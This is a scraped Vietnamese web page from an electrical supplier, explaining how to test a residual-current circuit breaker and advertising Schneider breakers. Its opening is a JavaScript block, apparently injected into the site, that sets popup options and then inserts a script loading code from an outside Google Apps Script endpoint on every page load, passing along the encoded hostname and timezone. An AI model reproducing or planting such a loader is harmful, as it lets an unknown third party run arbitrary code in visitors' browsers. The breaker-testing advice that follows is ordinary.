var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Đừng bỏ lỡ cách test cb chống giật [Hot Nhất 2023]

Việc lắp đặt CB chống giật đúng cách là điều vô cùng quan trọng để đảm bảo tính chính xác, cũng như hiệu quả hoạt động của thiết bị đối với việc xử lý các sự cố liên quan đến chập điện, ngắn mạch hay quá tải điện thường xảy ra tại nhiều gia đình hiện nay.

Tuy nhiên, để đảm bảo độ chuẩn xác cao nhất thì cách test CB chống giật sẽ là điều rất cần thiết mà mọi người không thể bỏ qua.

1. Vì sao cần phải test CB chống giật?

Dù là CB hay bất cứ một thiết bị nào, thì việc kiểm tra sản phẩm trước khi đưa vào sử dụng luôn là điều nên làm để:

 • Bảo đảm hoạt động ổn định của thiết bị khi đưa vào nguồn điện, hạn chế những sai phạm trong quá trình lắp đặt có thể gây hư hao, cháy nổ điện trong quá trình vận hành.
 • Xác định chất lượng của CB, nhằm tránh mua phải hàng giả, hàng kém chất lượng gây tốn kém chi phí, cũng như độ an toàn của thiết bị đối với người dùng.
 • Kiểm tra độ nhanh nhạy của CB trong việc xử lý các sự cố điện. Việc này sẽ giúp cho người dùng cảm thấy an tâm hơn, không lo gặp phải các sự cố bất ngờ trong quá trình sử dụng điện.
 • Khắc phục kịp thời những hư hỏng, sai phạm của CB chống giật. Qua đó, góp phần đảm bảo độ bền và tuổi thọ của sản phẩm.

CB chống giật

CB chống giật

2. Hướng dẫn cách test CB chống giật chính xác và an toàn nhất

Hiện tại, có 2 cách thử CB chống giật được giới chuyên môn áp dụng phổ biến nhất. Đó là:

2.1. Cách kiểm tra CB chống giật trực tiếp

Nhấn nút test có hình chữ T trên aptomat chống giật, nếu aptomat ngắt điện thì có nghĩa là thiết bị này đang hoạt động rất tốt. Ngược lại, nếu CB không ngắt hoặc ngắt điện chậm thì tốt nhất bạn nên kiểm tra lại đường dây điện để xem đã đấu chính xác chưa hoặc có bị hư hỏng gì không, nhằm kịp thời xử lý và thay mới aptomat.

2.2. Cách test CB chống giật bằng thiết bị tải

Để thực hiện cách test CB chống giật này, bạn cần chuẩn bị đầy đủ các thiết bị như: CB chống giật, bóng đèn, chóa đèn, 2 sợi dây điện cùng 1 công tắc quả nhót.

Khi kiểm tra CB, dây mát sẽ được đấu thẳng vào bóng đèn, chứ không đấu qua aptomat chống giật. Phần dây lửa và đầu ra của aptomat chống giật sẽ được đấu qua công tắc, sau đó mới đến bóng đèn. Khi aptomat chống giật đóng lại, công tắc điện bóng đèn được bật lên, nếu CB chống giật có thể tự động ngắt điện và bóng đèn không sáng lên tức là aptomat chống giật đó hoạt động tốt.

Test CB chống giật

Test CB chống giật

3. Một số lưu ý cần rõ khi test CB chống giật

Để đảm bảo an toàn trong quá trình kiểm tra CB chống giật, tốt nhất bạn nên nắm rõ hết những lưu ý sau đây:

 • Nên dùng đồng hồ miliampe để đo dòng sử dụng của tải nếu muốn biết chính xác dòng cắt của aptomat.
 • Tuyệt đối không được chập 2 dây mass lại với lửa trong lúc kiểm tra và đánh giá hiệu quả hoạt động của CB chống giật, bởi điều này có thể khiến cho CB bị hư hỏng, thậm chí gây ảnh hưởng trực tiếp đến tính mạng con người.
 • Không dùng tay hoặc các bộ phận khác trên cơ thể để trực tiếp thử aptomat chống giật.

Bài viết trên vừa hướng dẫn cho bạn cách test CB chống giật chính xác và an toàn nhất. Để được tư vấn và báo giá chi tiết về thiết bị này, khách hàng vui lòng liên hệ trực tiếp với Điện Phan Khang. Chúng tôi hiện đang là đơn vị nhập khẩu và phân phối các thiết bị CB chống giật chính hãng, đến từ thương hiệu cao cấp Schneider Electric hàng đầu tại Châu Âu.

4. Mua CB Chống giật loại tốt ở đâu ?

Bằng tất cả những thế mạnh có được, Điện Phan Khang cam kết sẽ mang đến cho bạn những dòng sản phẩm mang chất lượng tốt nhất với kiểu dáng sang trọng, hiện đại, đảm bảo an toàn, độ bền cao, cùng với đó là khả năng hoạt động ổn định trong mọi môi trường.

Các thông tin thêm về aptomat chống giật, CB chống giật, cầu dao chống giật

 1. HƯỚNG DẪN cách lựa chọn aptomat chống giật cho hộ gia đình
 2. Có nên dùng Aptomat chống giật cho hệ thống điện trong gia đình
 3. Điểm khác nhau giữa 2 loại CB chống giật và chống rò
 4. Hướng dẫn cách đấu CB chống giật Schneider chuẩn xác cực kỳ đơn giản
 5. Hướng dẫn cách test CB chống giật chính xác và an toàn nhất
 6. Mách bạn cách sửa CB chống giật khi bị nhảy liên tục
 7. Aptomat chống giật là gì? Có nên lắp aptomat chống giật cho gia đình?
 8. Bỏ túi kinh nghiệm mua aptomat chống giật phù hợp với nhu cầu sử dụng
 9. Aptomat khối chống giật giá bao nhiêu? Có đắt không?
 10. 5 lý do Aptomat chống giật Schneider luôn “ĐẮT KHÁCH”
 11. 10 lý do bạn nên chọn CB Aptomat chống giật RCBO Schneider
 12. So sánh Aptomat chống giật Schneider RCBO 1 pha và 3 pha
 13. Cầu dao chống giật Schneider có mấy loại?
 14. Aptomat khối chống giật là gì? Nên dùng loại nào tốt?
 15. Các thông số cầu dao chống giật quan trọng cần biết
 16. Nên chọn Aptomat chống giật như thế nào?
 17. Aptomat chống giật: Cách chọn và cách lắp đặt
 18. Aptomat chống dòng rò loại nào tốt và an toàn cao?
 19. Aptomat chống giật là gì ? Cấu tạo và nguyên lý hoạt động của Aptomat chống giật
 20. Các thông số cầu dao chống giật quan trọng cần biết
 21. Cần mua Cầu dao chống giật Schneider Chính hãng Uy tín Giá rẻ tại TPHCM